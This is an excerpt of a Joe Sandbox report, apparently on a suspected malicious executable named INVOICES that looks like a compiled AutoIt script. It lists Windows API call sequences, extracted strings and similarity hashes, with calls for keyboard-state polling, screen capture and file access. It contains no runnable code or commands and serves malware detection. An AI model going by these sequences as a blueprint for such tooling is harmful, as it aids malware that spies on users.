Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: 6cc4db60bb164f01b4767a6935c910ad779ec786f7b134d5fcaa5d2ce1a312cc
• Instruction ID: 33f0be2add6de18608b1c4519de2af54cf00735432f6072f09b6b752289e0da4
• Opcode Fuzzy Hash: 6cc4db60bb164f01b4767a6935c910ad779ec786f7b134d5fcaa5d2ce1a312cc
• Instruction Fuzzy Hash: CC519EB1104304DFD710EF24C89596AB7E4FF88718F00896CF88957262DB39EE09CB92
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007B9239,?,?), ref: 007BBA8A
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007B9239,?,?,00000000,?), ref: 007BBAA1
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007B9239,?,?,00000000,?), ref: 007BBAAC
• CloseHandle.KERNEL32(00000000,?,?,?,?,007B9239,?,?,00000000,?), ref: 007BBAB9
• GlobalLock.KERNEL32(00000000), ref: 007BBAC2
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007B9239,?,?,00000000,?), ref: 007BBAD1
• GlobalUnlock.KERNEL32(00000000), ref: 007BBADA
• CloseHandle.KERNEL32(00000000,?,?,?,?,007B9239,?,?,00000000,?), ref: 007BBAE1
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007BBAF2
• OleLoadPicture.OLEAUT32(?,00000000,00000000,007C2CAC,?), ref: 007BBB0B
• GlobalFree.KERNEL32(00000000), ref: 007BBB1B
• GetObjectW.GDI32(00000000,00000018,?), ref: 007BBB3F
• CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007BBB6A
• DeleteObject.GDI32(00000000), ref: 007BBB92
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007BBBA8
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 1f3ce5ed4f43b702eae3e9b05a448a423b3a43655e293143d0738c8705336230
• Instruction ID: 52e500c1cb718fe68508ec65f2b1b0462f3f94821894990bb8d4b3a6900524c4
• Opcode Fuzzy Hash: 1f3ce5ed4f43b702eae3e9b05a448a423b3a43655e293143d0738c8705336230
• Instruction Fuzzy Hash: 46411575600209AFDB219F69DC88FAB7BB8FB89B11F108168F909D7260D7789901DB64
APIs
• __wsplitpath.LIBCMT ref: 0079DA9C
• _wcscat.LIBCMT ref: 0079DAB4
• _wcscat.LIBCMT ref: 0079DAC6
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0079DADB
• SetCurrentDirectoryW.KERNEL32(?), ref: 0079DAEF
• GetFileAttributesW.KERNEL32(?), ref: 0079DB07
• SetFileAttributesW.KERNEL32(?,00000000), ref: 0079DB21
• SetCurrentDirectoryW.KERNEL32(?), ref: 0079DB33
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
• Opcode ID: 16bfb2f272aac6c7ea366111235b52bfe299c573f463b2b3b50d0385cfe5e998
• Instruction ID: c2dd77febaa26f251450ef1b852c310066333e8048196d31bd6551038940adde
• Opcode Fuzzy Hash: 16bfb2f272aac6c7ea366111235b52bfe299c573f463b2b3b50d0385cfe5e998
• Instruction Fuzzy Hash: 2E8191B25082409FCF34EF64D8449AAB7E8FF89310F18882EF985D7251E678ED44CB52
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 007A74A4
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007A74B0
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 007A74BC
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 007A74C9
                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007A751D
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007A7559
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007A757D
                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 007A7585
                                                                                                                                  • DeleteObject.GDI32(?), ref: 007A758E
                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 007A7595
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 007A75A0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                  • Opcode ID: 258c6b20b3a5bd49eb74b4a12450df38f5aca17a2879e0b521542b33f3822820
                                                                                                                                  • Instruction ID: 4f415097850509288159600bb8bf6a24335fb3d0d3eff7278093a813f2cebfc9
                                                                                                                                  • Opcode Fuzzy Hash: 258c6b20b3a5bd49eb74b4a12450df38f5aca17a2879e0b521542b33f3822820
                                                                                                                                  • Instruction Fuzzy Hash: 21515A71904209EFCB15CFA8CC85EAEBBB9EF89710F14C62DF94997221D735A940CB64
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00750AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00736C6C,?,00008000), ref: 00750AF3
                                                                                                                                    • Part of subcall function 007348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007348A1,?,?,007337C0,?), ref: 007348CE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00736D0D
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00736E5A
                                                                                                                                    • Part of subcall function 007359CD: _wcscpy.LIBCMT ref: 00735A05
                                                                                                                                    • Part of subcall function 007537BD: _iswctype.LIBCMT ref: 007537C5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                  • API String ID: 537147316-1018226102
                                                                                                                                  • Opcode ID: ed81f5902d30e59d8e8e86827a57cc342f716588edf5ec5771e42b4dc4dc4deb
                                                                                                                                  • Instruction ID: 014faffd3c9288e308cce9cbac320be840c87934107551aa231aa9aea5500f90
                                                                                                                                  • Opcode Fuzzy Hash: ed81f5902d30e59d8e8e86827a57cc342f716588edf5ec5771e42b4dc4dc4deb
                                                                                                                                  • Instruction Fuzzy Hash: C502A070108341DFD724EF24C885AAFBBE5BF99314F04491DF886972A2DB38E949CB52
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007345F9
                                                                                                                                  • GetMenuItemCount.USER32(007F5890), ref: 0076D6FD
                                                                                                                                  • GetMenuItemCount.USER32(007F5890), ref: 0076D7AD
                                                                                                                                  • GetCursorPos.USER32(?), ref: 0076D7F1
                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0076D7FA
                                                                                                                                  • TrackPopupMenuEx.USER32(007F5890,00000000,?,00000000,00000000,00000000), ref: 0076D80D
                                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0076D819
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2751501086-0
                                                                                                                                  • Opcode ID: 98bf528ce591ea3aa7fa1feb845c4cd1766f7e4d0a89cdce09808cb0c51b4112
                                                                                                                                  • Instruction ID: 45a850cf7d74ab04162037a95366252567502615f53ed3fc8fca4bc2ba282eec
                                                                                                                                  • Opcode Fuzzy Hash: 98bf528ce591ea3aa7fa1feb845c4cd1766f7e4d0a89cdce09808cb0c51b4112
                                                                                                                                  • Instruction Fuzzy Hash: 7D71D070B40209BAFB349F14DC4AFAABF64FF05764F244216F91AA61E1C7B96C20CB55
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007AFE38,?,?), ref: 007B0EBC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                  • API String ID: 3964851224-909552448
                                                                                                                                  • Opcode ID: e15becd222a4500560f6e8818279086376cb97dadf9071469243455d2745d65b
                                                                                                                                  • Instruction ID: b8eb944be2cbbba35a3c07fd63f2439944d95238ee7f33176d9bec8187e7f1d3
                                                                                                                                  • Opcode Fuzzy Hash: e15becd222a4500560f6e8818279086376cb97dadf9071469243455d2745d65b
                                                                                                                                  • Instruction Fuzzy Hash: A44147752052CACFDF20EF14D8A8AEF3720AF16300F944564FD515B292EB7D995ACBA0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                    • Part of subcall function 00737A84: _memmove.LIBCMT ref: 00737B0D
                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007953D7
                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007953ED
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007953FE
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00795410
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00795421
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$_memmove
                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                  • API String ID: 2279737902-1007645807
                                                                                                                                  • Opcode ID: 3903f1a225e2009f727ced7c8d44d60998e6d9abd46e66cca3afbc80b007df9c
                                                                                                                                  • Instruction ID: 40e3b3ed7701696d4d4d851763f81da819bf3673893eb42fda72d1803c63cb64
                                                                                                                                  • Opcode Fuzzy Hash: 3903f1a225e2009f727ced7c8d44d60998e6d9abd46e66cca3afbc80b007df9c
                                                                                                                                  • Instruction Fuzzy Hash: 5111C8A09911B9B9EB64F7A2DC49DFF7B7CEB95B40F000429B405920D2DE680D44CAA1
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                  • API String ID: 208665112-3771769585
                                                                                                                                  • Opcode ID: bdd49c423b5b018d0dac08f1ab1a14903506e45fa96d9ccb94eaa8247efbee9c
                                                                                                                                  • Instruction ID: 9880ebcb309928c51366ee75eeb841894dca10c5db97f160314d45d60f081ff2
                                                                                                                                  • Opcode Fuzzy Hash: bdd49c423b5b018d0dac08f1ab1a14903506e45fa96d9ccb94eaa8247efbee9c
                                                                                                                                  • Instruction Fuzzy Hash: 9C110D31504118AFDF20A760FC4AFDA77BCDF16715F1441B5F80596091EFBC9A868751
APIs
• timeGetTime.WINMM ref: 00795021
  • Part of subcall function 0075034A: timeGetTime.WINMM(?,76C1B400,00740FDB), ref: 0075034E
• Sleep.KERNEL32(0000000A), ref: 0079504D
• EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 00795071
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00795093
• SetActiveWindow.USER32 ref: 007950B2
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007950C0
• SendMessageW.USER32(00000010,00000000,00000000), ref: 007950DF
• Sleep.KERNEL32(000000FA), ref: 007950EA
• IsWindow.USER32 ref: 007950F6
• EndDialog.USER32(00000000), ref: 00795107
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
APIs
  • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
  • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
• CoInitialize.OLE32(00000000), ref: 0079D676
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0079D709
• SHGetDesktopFolder.SHELL32(?), ref: 0079D71D
• CoCreateInstance.COMBASE(007C2D7C,00000000,00000001,007E8C1C,?), ref: 0079D769
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0079D7D8
• CoTaskMemFree.COMBASE(?), ref: 0079D830
• _memset.LIBCMT ref: 0079D86D
• SHBrowseForFolderW.SHELL32(?), ref: 0079D8A9
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0079D8CC
• CoTaskMemFree.COMBASE(00000000), ref: 0079D8D3
• CoTaskMemFree.COMBASE(00000000), ref: 0079D90A
• CoUninitialize.COMBASE ref: 0079D90C
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
APIs
• GetKeyboardState.USER32(?), ref: 007903C8
• SetKeyboardState.USER32(?), ref: 00790433
• GetAsyncKeyState.USER32(000000A0), ref: 00790453
• GetKeyState.USER32(000000A0), ref: 0079046A
• GetAsyncKeyState.USER32(000000A1), ref: 00790499
• GetKeyState.USER32(000000A1), ref: 007904AA
• GetAsyncKeyState.USER32(00000011), ref: 007904D6
• GetKeyState.USER32(00000011), ref: 007904E4
• GetAsyncKeyState.USER32(00000012), ref: 0079050D
• GetKeyState.USER32(00000012), ref: 0079051B
• GetAsyncKeyState.USER32(0000005B), ref: 00790544
• GetKeyState.USER32(0000005B), ref: 00790552
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 0078C545
• GetWindowRect.USER32(00000000,?), ref: 0078C557
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0078C5B5
• GetDlgItem.USER32(?,00000002), ref: 0078C5C0
• GetWindowRect.USER32(00000000,?), ref: 0078C5D2
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0078C626
• GetDlgItem.USER32(?,000003E9), ref: 0078C634
• GetWindowRect.USER32(00000000,?), ref: 0078C645
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0078C688
• GetDlgItem.USER32(?,000003EA), ref: 0078C696
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0078C6B3
• InvalidateRect.USER32(?,00000000,00000001), ref: 0078C6C0
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
APIs
  • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
• GetSysColor.USER32(0000000F), ref: 007321D3
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
APIs
• CharLowerBuffW.USER32(?,?,007BF910), ref: 0079A995
• GetDriveTypeW.KERNEL32(00000061,007E89A0,00000061), ref: 0079AA5F
• _wcscpy.LIBCMT ref: 0079AA89
Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                  • API String ID: 2820617543-1000479233
                                                                                                                                  • Opcode ID: 4e19f25701b7ba38cf48a381e98d71977feb801aeda35e45046217f002372678
                                                                                                                                  • Instruction ID: b3be1f855ceb181a67192e0e9636ac5303257abc9b2aef2d1189c4788b5de3f2
                                                                                                                                  • Opcode Fuzzy Hash: 4e19f25701b7ba38cf48a381e98d71977feb801aeda35e45046217f002372678
                                                                                                                                  • Instruction Fuzzy Hash: 4851DF31109341AFCB14EF14D895AAEB7A5FF85300F10892DF996572A2DB78AD09CB93
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __i64tow__itow__swprintf
                                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                                  • API String ID: 421087845-2263619337
                                                                                                                                  • Opcode ID: b1463a67b05f9314a48368806a032c488b395c82504f39e79a68d8c16b3bab97
                                                                                                                                  • Instruction ID: f4b32b02b0939b7043a707f9589b0e2595e6d631dbf0c15fecd33f58b253803d
                                                                                                                                  • Opcode Fuzzy Hash: b1463a67b05f9314a48368806a032c488b395c82504f39e79a68d8c16b3bab97
                                                                                                                                  • Instruction Fuzzy Hash: 8741E771514206EFEB249F34DC46F7677E4EF44300F2044AEE94AD7292EAB9AD42CB51
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007B719C
                                                                                                                                  • CreateMenu.USER32 ref: 007B71B7
                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 007B71C6
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B7253
                                                                                                                                  • IsMenu.USER32(?), ref: 007B7269
                                                                                                                                  • CreatePopupMenu.USER32 ref: 007B7273
                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007B72A0
                                                                                                                                  • DrawMenuBar.USER32 ref: 007B72A8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                  • String ID: 0$F
                                                                                                                                  • API String ID: 176399719-3044882817
                                                                                                                                  • Opcode ID: 8fe602e6ed081e317b3334af592c85a45038f0008f6dcd9cfa50bf262b2b4475
                                                                                                                                  • Instruction ID: d86a58b1b8117e4643199b1e084c579341add8540e9c3c391a123f44c7e4b634
                                                                                                                                  • Opcode Fuzzy Hash: 8fe602e6ed081e317b3334af592c85a45038f0008f6dcd9cfa50bf262b2b4475
                                                                                                                                  • Instruction Fuzzy Hash: F7414974A01209EFDB24DF64D884FDA7BB5FF89350F144129F905A7361D738A910CBA4
                                                                                                                                  APIs
                                                                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007B7590
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 007B7597
                                                                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007B75AA
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 007B75B2
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 007B75BD
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 007B75C6
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 007B75D0
                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007B75E4
                                                                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007B75F0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                                                  • Opcode ID: e0552514cc41cd9e0ef027b94dee100e2939d31b44beed1f956ac32d213e2f8a
                                                                                                                                  • Instruction ID: da43c2f68469d2fc8908e1a5c32fbe5690b465ab05e092ed64c5bc84b3a99853
                                                                                                                                  • Opcode Fuzzy Hash: e0552514cc41cd9e0ef027b94dee100e2939d31b44beed1f956ac32d213e2f8a
                                                                                                                                  • Instruction Fuzzy Hash: 4C316D71104119BBDF269F68DC08FEA3B69FF49720F114325FA15A61A0C739E821DB64
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00756FBB
